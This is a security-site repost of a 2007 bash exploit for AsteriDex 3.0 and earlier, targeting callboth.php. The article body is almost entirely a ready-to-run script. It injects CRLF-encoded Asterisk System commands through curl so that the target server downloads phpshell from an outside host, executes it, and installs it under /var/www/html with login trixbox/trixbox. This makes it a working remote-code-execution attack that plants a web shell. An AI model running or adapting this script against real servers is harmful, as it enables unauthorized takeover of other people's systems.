首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AsteriDex <= 3.0 Remote (callboth.php) Remote Code Execution Exploit
来源:Hoku Security 作者:Carl 发布时间:2007-07-06  
##
## Begin exploit
##
#!/bin/bash

echo Asteridex PoC Exploit (callboth.php vulnerability)
echo By Carl Livitt / Hoku Security / June 2007
echo

# This has to be (a) a valid SIP address, and (b) must answer when dialled.
# The exploit will fail without these conditions being met.
# Currently uses the Melonite SIP echo test service.
SIP="190@sip.melonite.nu"

# Magic number, don't change. The default installation of AsteriDex checks
# for this number and fails without it.
SEQ=654321

# Other stuff we need
LOC=/asteridex/callboth.php
OUT=123456

# Sanity
if [ "$1X" == "X" ]; then
       echo Syntax: $0 \<Host IP\[:port\]\>
       echo For example: $0 www.example.com:8080
       exit 1
fi

# Insanity
echo "[-] Exploiting host $1 - please wait"
echo -n '[+]' Building shell script
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20\!/bin/sh>/tmp/t%0d%0a" &>/dev/null
echo -n .
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20wget%20%2dO%20x.tar.bz2%20%5c%27http://%3e%3e/tmp/t%0d%0a" &>/dev/null
echo -n .
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20prdownloads.sf.net/phpshell/%3e%3e/tmp/t%0d%0a" &>/dev/null
echo .
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20phpshell%2d2.1.tar.bz2%3fdownload%5c%27%3e%3e/tmp/t%0d%0a" &>/dev/null
echo '[+] Executing shell script'
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp;chmod%20%2bx%20t;./t;tar%20jxf%20x.tar.bz2%0d%0a" &>/dev/null
echo -n '[+] Setting up phpshell'
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20cd%20/tmp;mv%20phpshell-2.1%20p%0d%0a" &>/dev/null
echo -n .
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp/p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>/dev/null
echo -n .
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp/p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0d%0a" &>/dev/null
echo .
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20mv%20/tmp/p%20/var/www/html/phpshell%0d%0a" &>/dev/null

# Have a nice day
echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php"
echo You can login with the username \'trixbox\' and password \'trixbox\'

##
## End Exploit
##
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SMF WAV capcha breaker
·ViRC 2.0 (JOIN Response) Remot
·IE 6 / Dart Communications Pow
·PNphpBB2 <= 1.2i viewforum.php
·HP Digital Imaging (hpqvwocx.d
·ESRI ArcSDE 9.0 - 9.2sp1 Remot
·SAP DB 7.4 WebTools Remote SEH
·MyCMS <= 0.9.8 Remote Command
·NeoTracePro 3.25 ActiveX Trace
·MyCMS <= 0.9.8 Remote Command
·Chilkat Zip ActiveX Component
·AXIS Camera Control (AxisCamCo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved